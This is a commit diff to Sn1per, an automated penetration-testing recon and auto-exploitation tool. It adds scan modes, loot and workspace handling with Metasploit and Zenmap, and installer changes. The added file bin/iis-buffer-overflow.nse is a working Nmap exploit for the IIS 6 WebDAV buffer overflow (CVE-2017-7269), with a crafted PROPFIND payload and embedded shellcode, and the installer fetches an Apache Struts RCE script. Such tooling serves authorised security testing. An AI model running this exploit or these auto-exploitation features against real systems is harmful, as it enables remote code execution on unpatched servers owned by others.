Sn1per by 1N3@CrowdShield

Bunch of optimization and less code verbosity

CHANGELOG.md

@@ -1,4 +1,41 @@
 ## CHANGELOG:
+* v2.4 - Added detection for open X11 servers
+* v2.4 - Added IIS6 Win2k3 RCE NMap script
+* v2.4 - Added option to disable Google Hacking queries via Firefox
+* v2.3d - Fixed issue with loot command
+* v2.3c - Added Apache Struts 2 RCE NMap script
+* v2.3c - Added Apache Struts 2 RCE NMap exploit
+* v2.3b - Changed NMap scan options to exclude ping sweeps (-P0)
+* v2.3a - Fixed minor issue with MSSQL NMap script command (CC. @helo86)
+* v2.3 - Fixed minor issues with missing $TARGET definitions for NMap (CC. @helo86)
+* v2.2f - Added various optimizations and minor code fixes
+* v2.2e - Changed NMap scan options (removed -P0 flag)
+* v2.2d - Added MongoDB checks
+* v2.2d - Improved NMap scanning options
+* v2.2c - Added CouchDB checks
+* v2.2c - Updated Sub-domain takeover list
+* v2.2b - Added fullportonly mode to do exclusive full port scans
+* v2.2b - Fixed minor issue with Metasploit Pro not starting
+* v2.2b - Fixed minor issue with sniper loot command
+* v2.2a - Fixed minor issue with loot function
+* v2.2 - Added auto Metasploit Pro & Zenmap GUI integration
+* v2.2 - Added Sn1per workspaces to loot directory
+* v2.1d - Added crt.sh sub-domain check
+* v2.1d - Removed blank screenshots from loot directory
+* v2.1c - Fixed issue with install.sh install directories
+* v2.1b - Added automatic Metasploit NMap xml imports for loot directory
+* v2.1b - Removed Zenmap
+* v2.1a - Separated Arachni reports for port 80/443/tcp
+* v2.1a - Fixed NMap full port scan options
+* v2.1 - Added Arachni with auto HTML web reporting (web mode only)
+* v2.1 - Added full NMap detailed port scans
+* v2.1 - Added port 4443/tcp checks
+* v2.1 - Added META tag scans for web apps
+* v2.1 - Removed Uniscan from web mode
+* v2.1 - Removed SQLMap from web mode
+* v2.0b - Added help option --help
+* v2.0a - Fixed issue with ssh-audit
+* v2.0a - Fixed issue with 'discover' mode
 * v2.0 - Updated sub-domain takeover list
 * v2.0 - Improved scan performance for stealth, airstrike and discover modes
 * v2.0 - Removed jexboss due to clear screen issue with output
@@ -106,4 +143,8 @@
 * v1.4 - Removed debug output from goohak from displaying on console
 
 ## FUTURE:
-* Add scan config options to enabled/disable certain scan tasks (ie. brute force, osint, web scans, etc.)
+* Add auto logging and reporting to all scans
+* Add HTML reporting for scans
+* Add automated Wireless attacks to Sn1per
+* Add automated MITM attacks to Sn1per
+* Add web mode port option for customized web scans

README.md

@@ -19,6 +19,8 @@ Sn1per is an automated scanner that can be used during a penetration test to enu
 * Automatically exploit remote hosts to gain remote shell access
 * Performs high level enumeration of multiple hosts
 * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds
+* Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting
+* Create individual workspaces to store all scan output
 
 ## KALI LINUX INSTALL:
 ```
@@ -45,6 +47,7 @@ sniper <target> <report>
 sniper <target> stealth <report>
 sniper <CIDR> discover
 sniper <target> port <portnum> 
+sniper <target> fullportonly <portnum>
 sniper <target> web <report>
 sniper <target> nobrute <report>
 sniper <targets.txt> airstrike <report>
@@ -57,11 +60,12 @@ sniper loot
 * **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking
 * **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.
 * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.
+* **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.
 * **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.   
 * **NOBRUTE:** Launches a full scan against a target host/domain without brute forcing services.
 * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IP's that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.
 * **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke. 
-* **LOOT:** Automatically organizes and displays loot folder in your browser and opens Zenmap GUI with all port scan results. To run, type 'sniper loot'.
+* **LOOT:** Automatically organizes and displays loot folder in your browser and opens Metasploit Pro and Zenmap GUI with all port scan results. To run, type 'sniper loot'.
 
 ## SAMPLE REPORT:
 https://gist.github.com/1N3/8214ec2da2c91691bcbc

bin/iis-buffer-overflow.nse

@@ -0,0 +1,181 @@
+local nmap = require "nmap"
+local string = require "string"
+local shortport = require "shortport"
+local vulns = require "vulns"
+
+-- NSE Buffer Overflow vulnerability in IIS
+
+---
+-- @usage
+-- ./nmap iis-buffer-overflow <target>
+--
+-- @output
+-- PORT   STATE  SERVICE
+-- 80/tcp open   http
+-- |  iis-buffer-overflow:
+-- |    VULNERABLE: Buffer Overflow in IIS 6 and Windows Server 2003 R2
+-- |       State: LIKELY_VULNERABLE
+-- |       Risk factor: High CVSS: 10.0
+-- |       Description:
+-- |         Buffer overflow in the ScStoragePathFromUrl function in the WebDAV
+-- |         service in Internet Information Services (IIS) 6.0
+-- |         in Microsoft Windows Server 2003 R2 allows remote attackers to execute
+-- |         arbitrary code via a long header beginning with "If: <http://" in a
+-- |         PROPFIND request, as exploited in the wild in July or August 2016.
+-- |
+-- |         Original exploit by Zhiniang Peng and Chen Wu.
+-- |
+-- |    References:
+-- |     https://github.com/edwardz246003/IIS_exploit,
+-- |_    https://0patch.blogspot.in/2017/03/0patching-immortal-cve-2017-7269.html
+--
+
+author = {
+  "Zhiniang Peng", -- Original author
+  "Chen Wu",       -- Original author
+  "Rewanth Cool"   -- NSE script author
+}
+license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
+categories = {"exploit", "vuln", "intrusive"}
+
+portrule = shortport.portnumber(80, "tcp")
+
+action = function(host, port)
+  local socket, response, try, catch, payload, shellcode, vulnerable_name
+
+  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
+  local vuln = {
+    title = 'Buffer Overflow in IIS 6 and Windows Server 2003 R2',
+    state = vulns.STATE.NOT_VULN,
+    risk_factor = "High",
+    description = [[
+Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0
+in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning
+with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.
+
+Original exploit by Zhiniang Peng and Chen Wu.
+    ]],
+    IDS = {
+      CVE = 'CVE-2017-7269'
+    },
+    scores = {
+      CVSS = '10.0'
+    },
+    references = {
+      'https://github.com/edwardz246003/IIS_exploit',
+      'https://0patch.blogspot.in/2017/03/0patching-immortal-cve-2017-7269.html'
+    },
+    dates = {
+      disclosure = {year = '2017', month = '03', day = '26'},
+    }
+  }
+
+  -- If domain name doesn't exist this line of code takes ip into consideration
+  vulnerable_name = host.targetname or host.ip
+
+  socket = nmap.new_socket()
+  catch = function()
+    socket:close()
+  end
+
+  try = nmap.new_try(catch)
+  try(socket:connect(host, port))
+
+  -- Crafting the payload by parts
+
+  -- Crafting the request with HTTP PROPFIND method
+  payload = 'PROPFIND / HTTP/1.1\r\nHost: ' .. vulnerable_name .. '\r\nContent-Length: 0\r\n'
+  payload = payload .. 'If: <http://' .. vulnerable_name .. '/aaaaaaa'
+
+  -- Random text added to payload (Can be modified only for experimental purposes)
+  payload = payload .. '\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd'
+  payload = payload .. '\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5'
+  payload = payload .. '\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91'
+  payload = payload .. '\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80'
+  payload = payload .. '\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3'
+  payload = payload .. '\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4'
+  payload = payload .. '\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88'
+  payload = payload .. '\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7'
+  payload = payload .. '\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab'
+  payload = payload .. '\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80'
+  payload = payload .. '\xb3\xe3\x95\xb7'
+
+  -- Main payload (Do not edit this part)
+  payload = payload .. '\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6'
+  payload = payload .. '\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88'
+  payload = payload .. '\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5'
+  payload = payload .. '\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83'
+  payload = payload .. '\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d'
+  payload = payload .. '\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7'
+  payload = payload .. '\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'
+
+  payload = payload .. '>'
+  payload = payload .. ' (Not <locktoken:write1>) <http://' .. vulnerable_name .. '/bbbbbbb'
+
+  -- Random text added to payload (Can be modified only for experimental purposes)
+  payload = payload .. '\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6'
+  payload = payload .. '\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5'
+  payload = payload .. '\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7'
+  payload = payload .. '\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5'
+  payload = payload .. '\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5'
+  payload = payload .. '\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4'
+  payload = payload .. '\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6'
+  payload = payload .. '\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7'
+  payload = payload .. '\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3'
+  payload = payload .. '\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5'
+
+  -- Main payload (Do not edit this part)
+  payload = payload .. '\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7'
+  payload = payload .. '\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6'
+  payload = payload .. '\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5'
+  payload = payload .. '\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7'
+  payload = payload .. '\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6'
+  payload = payload .. '\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae'
+  payload = payload .. '\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80'
+  payload = payload .. '\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c'
+  payload = payload .. '\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0'
+  payload = payload .. '\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8'
+  payload = payload .. '\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'
+
+  -- Shellcode
+  shellcode = 'VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABA'
+  shellcode = shellcode .. 'BAB30APB944JB6X6WMV7O7Z8Z8Y8Y2TMTJT1M017Y6Q01010ELSKS0ELS3SJM0K7T0J061K4K6U7W5KJLOLMR5ZNL0ZMV5L5LMX1ZLP0V'
+  shellcode = shellcode .. '3L5O5SLZ5Y4PKT4P4O5O4U3YJL7NLU8PMP1QMTMK051P1Q0F6T00NZLL2K5U0O0X6P0NKS0L6P6S8S2O4Q1U1X06013W7M0B2X5O5R2O0'
+  shellcode = shellcode .. '2LTLPMK7UKL1Y9T1Z7Q0FLW2RKU1P7XKQ3O4S2ULR0DJN5Q4W1O0HMQLO3T1Y9V8V0O1U0C5LKX1Y0R2QMS4U9O2T9TML5K0RMP0E3OJZ'
+  shellcode = shellcode .. '2QMSNNKS1Q4L4O5Q9YMP9K9K6SNNLZ1Y8NMLML2Q8Q002U100Z9OKR1M3Y5TJM7OLX8P3ULY7Y0Y7X4YMW5MJULY7R1MKRKQ5W0X0N3U1'
+  shellcode = shellcode .. 'KLP9O1P1L3W9P5POO0F2SMXJNJMJS8KJNKPA'
+
+  payload = payload .. shellcode
+  payload = payload .. '>\r\n\r\n'
+
+  -- Exploiting the vulnerability
+  try(socket:send(payload))
+
+  -- We receive a 200 response if the payload succeeds.
+  response = try(socket:receive_bytes(80960))
+  socket:close()
+
+  -- Checking for 200 response in the response
+  local regex = "HTTP/1.1 (%d+)"
+  local status = string.match(response, regex)
+
+  if status == '200' then
+    -- Buffer overflow is successfully executed on the server.
+    vuln.state = vulns.STATE.EXPLOIT,
+    vuln.exploit_results = response
+  elseif status == '400' then
+    -- Bad request error is occured because webdav is not installed.
+    vuln.state = vulns.STATE.LIKELY_VULN,
+    vuln.exploit_results = "Server returned 400: Install webdav and try again."
+  elseif status == '502' then
+    -- Likely to have an error in the Server Name
+    vuln.state = vulns.STATE.LIKELY_VULN,
+    vuln.exploit_results = "Server returned 502: Please try to change ServerName and run the exploit again"
+  elseif status ~= nil then
+    vuln.exploit_results = response
+  end
+
+  return vuln_report:make_output(vuln)
+
+end
+

install.sh

@@ -19,18 +19,25 @@ echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
 echo ""
 
 INSTALL_DIR=/usr/share/sniper
+LOOT_DIR=/usr/share/sniper/loot
 PLUGINS_DIR=/usr/share/sniper/plugins
 
 echo -e "$OKGREEN + -- --=[This script will install sniper under $INSTALL_DIR. Are you sure you want to continue?$RESET"
 read answer 
 
 mkdir -p $INSTALL_DIR 2> /dev/null
+mkdir -p $LOOT_DIR 2> /dev/null
+mkdir $LOOT_DIR/domains 2> /dev/null
+mkdir $LOOT_DIR/screenshots 2> /dev/null
+mkdir $LOOT_DIR/nmap 2> /dev/null
+mkdir $LOOT_DIR/reports 2> /dev/null
+mkdir $LOOT_DIR/output 2> /dev/null
 cp -Rf $PWD/* $INSTALL_DIR 
 cd $INSTALL_DIR
 
 echo -e "$OKORANGE + -- --=[Installing package dependencies...$RESET"
 apt-get install ruby rubygems python dos2unix zenmap sslyze uniscan xprobe2 cutycapt unicornscan waffit host whois dirb dnsrecon curl nmap php php-curl hydra iceweasel wpscan sqlmap nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb sslscan amap
-pip install dnspython colorama tldextract urllib3 ipaddress
+pip install dnspython colorama tldextract urllib3 ipaddress arachni
 
 echo -e "$OKORANGE + -- --=[Installing gem dependencies...$RESET"
 gem install rake
@@ -38,8 +45,9 @@ gem install ruby-nmap net-http-persistent mechanize text-table
 
 echo -e "$OKORANGE + -- --=[Cleaning up old extensions...$RESET"
 rm -Rf Findsploit/ BruteX/ Goohak/ XSSTracer/ MassBleed/ SuperMicro-Password-Scanner/ CMSmap/ yasuo/ Sublist3r/ shocker/ jexboss/ serializekiller/ testssl.sh/ SimpleEmailSpoofer/ ssh-audit/ plugins/ 2> /dev/null
-mkdir /usr/share/sniper/plugins/
+mkdir $PLUGINS_DIR
 cd $PLUGINS_DIR
+mkdir -p $PLUGINS_DIR/nmap_scripts/ 2> /dev/null
 
 echo -e "$OKORANGE + -- --=[Downloading extensions...$RESET"
 git clone https://github.com/1N3/Findsploit.git 
@@ -56,9 +64,11 @@ git clone https://github.com/nccgroup/shocker.git
 git clone https://github.com/drwetter/testssl.sh.git 
 git clone https://github.com/lunarca/SimpleEmailSpoofer 
 git clone https://github.com/arthepsy/ssh-audit 
+wget https://svn.nmap.org/nmap/scripts/http-vuln-cve2017-5638.nse -O /usr/share/nmap/scripts/http-vuln-cve2017-5638.nse
+cp $PWD/bin/iis-buffer-overflow.nse /usr/share/nmap/scripts/iis-buffer-overflow.nse
 echo -e "$OKORANGE + -- --=[Setting up environment...$RESET"
-cd $PLUGINS_DIR/BruteX/
-bash install.sh
+cd $PLUGINS_DIR/Findsploit/ && bash install.sh
+cd $PLUGINS_DIR/BruteX/ && bash install.sh
 cd $INSTALL_DIR 
 mkdir $LOOT_DIR 2> /dev/null
 mkdir $LOOT_DIR/screenshots/ -p 2> /dev/null

sniper

@@ -1,10 +1,10 @@
 #!/bin/bash
-# + -- --=[Sn1per v2.0 by 1N3 
+# + -- --=[Sn1per by 1N3 
 # + -- --=[http://crowdshield.com
 #
 # Sn1per - Automated Pentest Recon Tool
 #
-# FEATURED:
+# FEATURES:
 # - Automatically collect recon info (ie. whois, ping, DNS, etc.)
 # - Automatically collects Google hacking recon info
 # - Automatically run port scans
@@ -20,20 +20,23 @@
 # ./install.sh - Installs all dependencies. Best run from Kali Linux. 
 #
 # USAGE:
-# ./sniper <target>
-# ./sniper <target> <report>
-# ./sniper <CIDR> discover <report>
-# ./sniper <target> stealth <report>
-# ./sniper <target> port <portnum>
-# ./sniper <target> web <report>
-# ./sniper <targets.txt> airstrike <report>
-# ./sniper <targets.txt> nuke <report>
-# ./sniper loot
+# sniper <target>
+# sniper <target> <report>
+# sniper <CIDR> discover <report>
+# sniper <target> stealth <report>
+# sniper <target> port <portnum>
+# sniper <target fullportonly <portnum>
+# sniper <target> web <report>
+# sniper <targets.txt> airstrike <report>
+# sniper <targets.txt> nuke <report>
+# sniper loot
 #
 
+VER="2.4"
 TARGET="$1"
 MODE="$2"
 OPT1="$3"
+DISABLE_POSTGRESQL="true" # disabling postgresql startup, assuming it's running already
 INSTALL_DIR="/usr/share/sniper"
 LOOT_DIR="/usr/share/sniper/loot"
 PLUGINS_DIR="/usr/share/sniper/plugins"
@@ -45,6 +48,7 @@ USER_FILE="/usr/share/brutex/wordlists/simple-users.txt"
 PASS_FILE="/usr/share/brutex/wordlists/password.lst"
 DNS_FILE="/usr/share/brutex/wordlists/namelist.txt"
 SUPER_MICRO_SCAN="/usr/share/sniper/plugins/SuperMicro-Password-Scanner/supermicro_scan.sh"
+DEFAULT_PORTS="21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,5984,6667,8000,8009,8080,8180,8443,8888,10000,27017,27018,27019,28017,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049"
 THREADS="30"
 OKBLUE='\033[94m'
 OKRED='\033[91m'
@@ -53,12 +57,113 @@ OKORANGE='\033[93m'
 RESET='\e[0m'
 REGEX='^[0-9]+$'
 
-cd $INSTALL_DIR
-
 # ENABLE/DISABLE AUTOMATIC BRUTE FORCE
 # DEFAULT IS "1" (ENABLED)
 AUTOBRUTE="1"
 
+# ENABLE/DISABLE FULL DETAILED NMAP SCAN
+# DEFAULT IS "1" (ENABLED)
+FULLNMAPSCAN="1"
+
+# ENABLE/DISABLE AUTOMATIC GOOGLE HACKING QUERIES
+# DEFAULT IS "1" (ENABLED)
+GOOHAK="1"
+
+cd $INSTALL_DIR
+
+function loot {
+	echo -e "$OKRED                ____               $RESET"
+	echo -e "$OKRED    _________  /  _/___  ___  _____$RESET"
+	echo -e "$OKRED   / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
+	echo -e "$OKRED  (__  ) / / // // /_/ /  __/ /    $RESET"
+	echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/     $RESET"
+	echo -e "$OKRED               /_/                 $RESET"
+	echo ""
+	echo -e "$OKORANGE + -- --=[Current workspaces...$RESET"
+	cd $LOOT_DIR
+	ls -lh $LOOT_DIR/workspace/
+	echo -e "$OKORANGE + -- --=[Enter a name for the workspace:$RESET"
+	read WORKSPACE
+	if [ -z $WORKSPACE ]; then
+		WORKSPACE="default"
+	fi
+	mkdir -p $LOOT_DIR/workspace/$WORKSPACE 2> /dev/null
+	echo -e "$OKORANGE + -- --=[Generating reports...$RESET"
+	for a in `ls sniper-*.txt 2>/dev/null`; 
+	do 
+		echo "$a" > $LOOT_DIR/reports/$a
+		sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g" $a >> $LOOT_DIR/reports/$a
+		mv $a $LOOT_DIR/output/
+	done
+	echo -e "$OKORANGE + -- --=[Removing blank web screenshots...$RESET"
+	find /usr/share/sniper/loot/screenshots/ -size -10k -exec rm -f {} \; 2> /dev/null
+	rm -f $LOOT_DIR/.fuse_* 2> /dev/null
+	echo -e "$OKORANGE + -- --=[Starting Metasploit service...$RESET"
+	/etc/init.d/metasploit start 2> /dev/null
+	if [ -z $DISABLE_POSTGRESQL ]; then /etc/init.d/postgresql start 2> /dev/null; fi
+	echo -e "$OKORANGE + -- --=[Importing NMap XML files into Metasploit...$RESET"
+	msfconsole -x "workspace -a $WORKSPACE; workspace $WORKSPACE; db_import $LOOT_DIR/nmap/nmap*.xml; hosts; services; exit;"
+	echo -e "$OKORANGE + -- --=[Copying loot to workspace: $WORKSPACE...$RESET"
+	cp -Rf $LOOT_DIR/screenshots/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
+	cp -Rf $LOOT_DIR/nmap/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
+	cp -Rf $LOOT_DIR/domains/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
+	cp -Rf $LOOT_DIR/output/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
+	cp -Rf $LOOT_DIR/reports/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
+	cp -Rf $LOOT_DIR/imports/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
+	cp -Rf $LOOT_DIR/notes/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
+	cp -Rf $LOOT_DIR/web/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
+	rm -Rf $LOOT_DIR/{screenshots,nmap,domains,output,reports,imports,notes,web}/ 2> /dev/null
+	mkdir $LOOT_DIR/{screenshots,nmap,domains,output,reports,imports,notes,web}/ -p 2> /dev/null
+	echo -e "$OKORANGE + -- --=[Opening workspace directory...$RESET"
+	iceweasel 2> /dev/null &
+	sleep 2
+	iceweasel $LOOT_DIR/workspace/$WORKSPACE 2> /dev/null &
+	sleep 2
+	echo -e "$OKORANGE + -- --=[Launching Metasploit Pro Web UI...$RESET"
+	iceweasel http://localhost:3001/login 2> /dev/null &
+	echo -e "$OKORANGE + -- --=[Launching Zenmap...$RESET"
+	zenmap -f $LOOT_DIR/workspace/$WORKSPACE/nmap/ 2> /dev/null &
+	echo -e "$OKORANGE + -- --=[Done!$RESET"
+}
+
+function help {
+	echo -e "$OKRED                ____               $RESET"
+	echo -e "$OKRED    _________  /  _/___  ___  _____$RESET"
+	echo -e "$OKRED   / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
+	echo -e "$OKRED  (__  ) / / // // /_/ /  __/ /    $RESET"
+	echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/     $RESET"
+	echo -e "$OKRED               /_/                 $RESET"
+	echo ""
+	echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
+	echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3$RESET"
+	echo -e "$OKORANGE + -- --=[Usage:"
+	echo ""
+	echo ' [*] sniper <target> <report>'
+	echo ' [*] sniper <target> stealth <report>'
+	echo ' [*] sniper <CIDR> discover'
+	echo ' [*] sniper <target> port <portnum>'
+	echo ' [*] sniper <target> fullportonly <portnum>'
+	echo ' [*] sniper <target> web <report>'
+	echo ' [*] sniper <target> nobrute <report>'
+	echo ' [*] sniper <targets.txt> airstrike <report>'
+	echo ' [*] sniper <targets.txt> nuke <report>'
+	echo ' [*] sniper loot'
+	echo ""
+	echo ' + -- --=[Modes:'
+	echo ''
+   echo ' + -- --=[REPORT: Outputs all results to text in the loot directory for later reference. To enable reporting, append report to any sniper mode or command.'
+   echo ' + -- --=[STEALTH: Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking'
+   echo ' + -- --=[DISCOVER: Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.'
+   echo ' + -- --=[PORT: Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.'
+   echo ' + -- --=[WEB: Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.'
+   echo ' + -- --=[NOBRUTE: Launches a full scan against a target host/domain without brute forcing services.'
+   echo ' + -- --=[AIRSTRIKE: Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.'
+   echo ' + -- --=[NUKE: Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.'
+   echo -e " + -- --=[LOOT: Automatically organizes and displays loot folder in your browser and opens Zenmap GUI with all port scan results. To run, type sniper loot.$RESET"
+   echo ""
+   echo ""
+}
+
 if [ -z $TARGET ]; then
 	echo -e "$OKRED                ____               $RESET"
